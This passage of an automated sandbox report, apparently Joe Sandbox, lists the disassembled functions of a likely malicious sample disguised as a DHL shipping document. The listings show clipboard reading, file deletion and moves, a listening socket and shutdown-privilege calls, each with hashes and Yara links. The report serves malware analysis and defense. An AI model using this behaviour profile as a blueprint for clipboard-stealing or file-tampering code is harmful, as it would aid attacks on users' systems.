                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00880D0C
                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00880D1E
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00880D45
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880D4C
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00880D55
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880D5C
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00880D65
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880D6C
                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00880D78
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880D7F
                                                                                              • Part of subcall function 00881193: GetProcessHeap.KERNEL32(00000008,00880BB1,?,00000000,?,00880BB1,?), ref: 008811A1
                                                                                              • Part of subcall function 00881193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00880BB1,?), ref: 008811A8
                                                                                              • Part of subcall function 00881193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00880BB1,?), ref: 008811B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                            • String ID:
                                                                                            • API String ID: 4175595110-0
                                                                                            • Opcode ID: 101483eaeacb677bc808aa82dc23880dea0d8eb53cc9acbaaf6a601e253f09f5
                                                                                            • Instruction ID: 76649905093c2d05268161b6cdf21d672f55b3432b01acf2f5a3e3926e694330
                                                                                            • Opcode Fuzzy Hash: 101483eaeacb677bc808aa82dc23880dea0d8eb53cc9acbaaf6a601e253f09f5
                                                                                            • Instruction Fuzzy Hash: B7715A7290020AAFEF50EFA4DC48BAEBBB9FF04300F144615E914E7191D775A909CF60
                                                                                            Function 0089EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenClipboard.USER32(008BCC08), ref: 0089EB29
                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0089EB37
                                                                                            • GetClipboardData.USER32(0000000D), ref: 0089EB43
                                                                                            • CloseClipboard.USER32 ref: 0089EB4F
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0089EB87
                                                                                            • CloseClipboard.USER32 ref: 0089EB91
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0089EBBC
                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0089EBC9
                                                                                            • GetClipboardData.USER32(00000001), ref: 0089EBD1
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0089EBE2
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0089EC22
                                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 0089EC38
                                                                                            • GetClipboardData.USER32(0000000F), ref: 0089EC44
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0089EC55
                                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0089EC77
                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0089EC94
                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0089ECD2
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0089ECF3
                                                                                            • CountClipboardFormats.USER32 ref: 0089ED14
                                                                                            • CloseClipboard.USER32 ref: 0089ED59
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                            • String ID:
                                                                                            • API String ID: 420908878-0
                                                                                            • Opcode ID: 9167f6fb75c1da7e4e8ae60a1d939f78fd0983ddf6cf4c5992625dc64d1fa2b8
                                                                                            • Instruction ID: ca9cc4fad58a85c9f211bdf5ca0a6158a22f78a424363adec36988857cc9ddfa
                                                                                            • Opcode Fuzzy Hash: 9167f6fb75c1da7e4e8ae60a1d939f78fd0983ddf6cf4c5992625dc64d1fa2b8
                                                                                            • Instruction Fuzzy Hash: FF61D034204206AFDB10EF28D889F2A7BA4FF85714F18461DF496D72A2DB31DD45CB62
                                                                                            Function 0089698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 008969BE
                                                                                            • FindClose.KERNEL32(00000000), ref: 00896A12
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00896A4E
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00896A75
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00896AB2
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00896ADF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                            • API String ID: 3830820486-3289030164
                                                                                            • Opcode ID: 6332b3cd921094faa049cdc90aab302c2201a2ac293475dbd35213dcceb523e1
                                                                                            • Instruction ID: 4940ea6ed802f6247f7bf641e16c8c194eec9f3c4372e37fe0fa4b8dd4123f17
                                                                                            • Opcode Fuzzy Hash: 6332b3cd921094faa049cdc90aab302c2201a2ac293475dbd35213dcceb523e1
                                                                                            • Instruction Fuzzy Hash: 26D14DB2508350AFC710EBA4D991EAFB7E8FF88704F444919F585C6191EB74DA48CBA3
                                                                                            Function 00899642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00899663
                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 008996A1
                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 008996BB
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 008996D3
                                                                                            • FindClose.KERNEL32(00000000), ref: 008996DE
                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 008996FA
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0089974A
                                                                                            • SetCurrentDirectoryW.KERNEL32(008E6B7C), ref: 00899768
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00899772
                                                                                            • FindClose.KERNEL32(00000000), ref: 0089977F
                                                                                            • FindClose.KERNEL32(00000000), ref: 0089978F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                            • String ID: *.*
                                                                                            • API String ID: 1409584000-438819550
                                                                                            • Opcode ID: 2014752018844aa74a0073bc4c93e2256e8977af82c978905c43bd50c17c9e6e
                                                                                            • Instruction ID: 34a4b57bd3cc5330bec5a4cfbb26915297902e7bc70e59770fdd9a2b2f84abfe
                                                                                            • Opcode Fuzzy Hash: 2014752018844aa74a0073bc4c93e2256e8977af82c978905c43bd50c17c9e6e
                                                                                            • Instruction Fuzzy Hash: E131C2325012197FDF14AFF9DC48ADE77ACFF49320F18425AF855E21A0EB75D9448A20
                                                                                            Function 0089979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 008997BE
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00899819
                                                                                            • FindClose.KERNEL32(00000000), ref: 00899824
                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00899840
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00899890
                                                                                            • SetCurrentDirectoryW.KERNEL32(008E6B7C), ref: 008998AE
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 008998B8
                                                                                            • FindClose.KERNEL32(00000000), ref: 008998C5
                                                                                            • FindClose.KERNEL32(00000000), ref: 008998D5
                                                                                              • Part of subcall function 0088DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0088DB00
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                            • String ID: *.*
                                                                                            • API String ID: 2640511053-438819550
                                                                                            • Opcode ID: 275f7243ffb144b0537ed7b2d36fbce0de94a86c8179c6003239e41f8eb5aeb0
                                                                                            • Instruction ID: c04d9f24304a520a394a41e1d7f90d0bc1d7af06fb1221c22d4e881ceb03f868
                                                                                            • Opcode Fuzzy Hash: 275f7243ffb144b0537ed7b2d36fbce0de94a86c8179c6003239e41f8eb5aeb0
                                                                                            • Instruction Fuzzy Hash: 4131A53150061D6BDF10BFB9DC48ADE77ACFF4A320F18416EE894F21A1EB75D9448A60
                                                                                            Function 00898195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(?), ref: 00898257
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00898267
                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00898273
                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00898310
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00898324
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00898356
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0089838C
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00898395
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                            • String ID: *.*
                                                                                            • API String ID: 1464919966-438819550
                                                                                            • Opcode ID: a2a4fc1bb600e5d78378da9dbced25b4fc1e475e84e44f9af2f8701e4be89f71
                                                                                            • Instruction ID: 3b8fd7dd40577fc91c7f8f3f837e6ac0cdea42a19ffea6c23931e7b39e6ccdb7
                                                                                            • Opcode Fuzzy Hash: a2a4fc1bb600e5d78378da9dbced25b4fc1e475e84e44f9af2f8701e4be89f71
                                                                                            • Instruction Fuzzy Hash: 89616B725043169FCB10EF64D8449AEB3E8FF89314F08892EF999D7251DB31E945CB92
                                                                                            Function 0088D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00823AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00823A97,?,?,00822E7F,?,?,?,00000000), ref: 00823AC2
                                                                                              • Part of subcall function 0088E199: GetFileAttributesW.KERNEL32(?,0088CF95), ref: 0088E19A
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0088D122
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0088D1DD
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0088D1F0
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0088D20D
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0088D237
                                                                                              • Part of subcall function 0088D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0088D21C,?,?), ref: 0088D2B2
                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 0088D253
                                                                                            • FindClose.KERNEL32(00000000), ref: 0088D264
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                            • String ID: \*.*
                                                                                            • API String ID: 1946585618-1173974218
                                                                                            • Opcode ID: 2b3f937f3f79967fba705623bf52cafeb458330b3eaa480255ed1ffc2da5f22e
                                                                                            • Instruction ID: 800facd3e280ca640b3f961df66e89973cde6206f63d52bba7fe5e84576f04d4
                                                                                            • Opcode Fuzzy Hash: 2b3f937f3f79967fba705623bf52cafeb458330b3eaa480255ed1ffc2da5f22e
                                                                                            • Instruction Fuzzy Hash: 7A61273180121DAACF05FBA4E9929EDB7B9FF55300F244165E442B7191EB30AF49CB62
                                                                                            Function 0089ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                            • String ID:
                                                                                            • API String ID: 1737998785-0
                                                                                            • Opcode ID: 24e2ba7706323aaf44a0d52a4e5aff7bd67b26087fc421ae90f0c3fdfda0de1a
                                                                                            • Instruction ID: bef3eb186a6b89930488b378f5fd205ee730ed7506407ee6bf2526afb41ceecd
                                                                                            • Opcode Fuzzy Hash: 24e2ba7706323aaf44a0d52a4e5aff7bd67b26087fc421ae90f0c3fdfda0de1a
                                                                                            • Instruction Fuzzy Hash: 41417C35604611AFDB20DF19E888F29BBA5FF44328F188199E429CB662C775EC41CB91
                                                                                            Function 0088E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 008816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0088170D
                                                                                              • Part of subcall function 008816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0088173A
                                                                                              • Part of subcall function 008816C3: GetLastError.KERNEL32 ref: 0088174A
                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0088E932
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                            • API String ID: 2234035333-3163812486
                                                                                            • Opcode ID: 18cc0b370e99ab911f4358893c931ad71aa778ad6a82ea46dbe42af406f343fb
                                                                                            • Instruction ID: c7b04576f2906d9da24a8d992345c9a53b84df5bd7d2aafbf25152eeacd074e8
                                                                                            • Opcode Fuzzy Hash: 18cc0b370e99ab911f4358893c931ad71aa778ad6a82ea46dbe42af406f343fb
                                                                                            • Instruction Fuzzy Hash: 9101F972610215ABEB6476B99C8AFBF775CF714754F154521FC13E21E2EAE0AC4083A0
                                                                                            Function 008A1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008A1276
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A1283
                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 008A12BA
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A12C5
                                                                                            • closesocket.WSOCK32(00000000), ref: 008A12F4
                                                                                            • listen.WSOCK32(00000000,00000005), ref: 008A1303
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A130D
                                                                                            • closesocket.WSOCK32(00000000), ref: 008A133C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                            • String ID:
                                                                                            • API String ID: 540024437-0
                                                                                            • Opcode ID: 46e932184fc121d166a7d455c7c2544730623c6da4ca4b4db6faeeedc07a5042
                                                                                            • Instruction ID: edc692186a83d3a1fdbe73c282509ef48e021acbef66848cdaaab204550c5dc0
                                                                                            • Opcode Fuzzy Hash: 46e932184fc121d166a7d455c7c2544730623c6da4ca4b4db6faeeedc07a5042
                                                                                            • Instruction Fuzzy Hash: 7A417F316001109FEB10DF68D588B2ABBE5FF46318F188198E856DF696C775ED81CBE1
                                                                                            Function 0085B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 0085B9D4
                                                                                            • _free.LIBCMT ref: 0085B9F8
                                                                                            • _free.LIBCMT ref: 0085BB7F
                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,008C3700), ref: 0085BB91
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,008F121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0085BC09
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,008F1270,000000FF,?,0000003F,00000000,?), ref: 0085BC36
                                                                                            • _free.LIBCMT ref: 0085BD4B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                            • String ID:
                                                                                            • API String ID: 314583886-0
                                                                                            • Opcode ID: a5f4a5ead29e6d5496fa40b0a0ba591149200040ef2a798eab3313af8d4816a9
                                                                                            • Instruction ID: 59c51eb0dbce57202b216201f234c6ecab971c756cb32ee8160dd10b0dbac60b
                                                                                            • Opcode Fuzzy Hash: a5f4a5ead29e6d5496fa40b0a0ba591149200040ef2a798eab3313af8d4816a9
                                                                                            • Instruction Fuzzy Hash: 5EC129719042489FCB21DF799C45BBABBB8FF61362F1441AAEC90E7251EB308E49C751
                                                                                            Function 0088D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00823AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00823A97,?,?,00822E7F,?,?,?,00000000), ref: 00823AC2
                                                                                              • Part of subcall function 0088E199: GetFileAttributesW.KERNEL32(?,0088CF95), ref: 0088E19A
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0088D420
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0088D470
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0088D481
                                                                                            • FindClose.KERNEL32(00000000), ref: 0088D498
                                                                                            • FindClose.KERNEL32(00000000), ref: 0088D4A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                            • String ID: \*.*
                                                                                            • API String ID: 2649000838-1173974218
                                                                                            • Opcode ID: dddbbd6decb1be583dfd4cac14b7424639e66e87b269ea7cfa4f9ec0ad3bfadb
                                                                                            • Instruction ID: 61a1010e6fd0b5fc7d277557e11e692f94e570d4984de8c46bc588d5839c9ac0
                                                                                            • Opcode Fuzzy Hash: dddbbd6decb1be583dfd4cac14b7424639e66e87b269ea7cfa4f9ec0ad3bfadb
                                                                                            • Instruction Fuzzy Hash: 81315C710083559BC304FF68E8958AFB7A8FE95314F444A2DF4D1D21A1EB30AA49CB67
                                                                                            Function 0085E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
